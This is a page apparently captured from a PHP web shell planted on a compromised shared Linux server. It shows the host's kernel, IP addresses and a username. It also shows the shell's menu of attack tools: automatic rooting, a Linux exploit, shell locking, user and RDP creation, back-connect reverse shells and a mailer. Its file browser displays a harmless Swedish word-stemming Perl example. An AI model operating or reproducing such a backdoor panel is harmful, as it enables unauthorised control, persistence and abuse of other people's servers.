Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libsnowball-swedish-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
stemmer-se.pl
516
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stemmer-se.pl
#!/usr/bin/perl # $Id: stemmer.pl,v 1.1 2007/05/07 12:01:14 ask Exp $ # $Source: /opt/CVS/SeSnowball/examples/stemmer.pl,v $ # $Author: ask $ # $HeadURL$ # $Revision: 1.1 $ # $Date: 2007/05/07 12:01:14 $ use strict; use warnings; use Lingua::Stem::Snowball::Se; use vars qw($VERSION); $VERSION = 1.2; my $stemmer = Lingua::Stem::Snowball::Se->new(use_cache => 1); while (my $line = <>) { chomp $line; foreach my $word ((split m/\s+/xms, $line)) { my $stemmed = $stemmer->stem($word); print "$stemmed\n"; } }
Close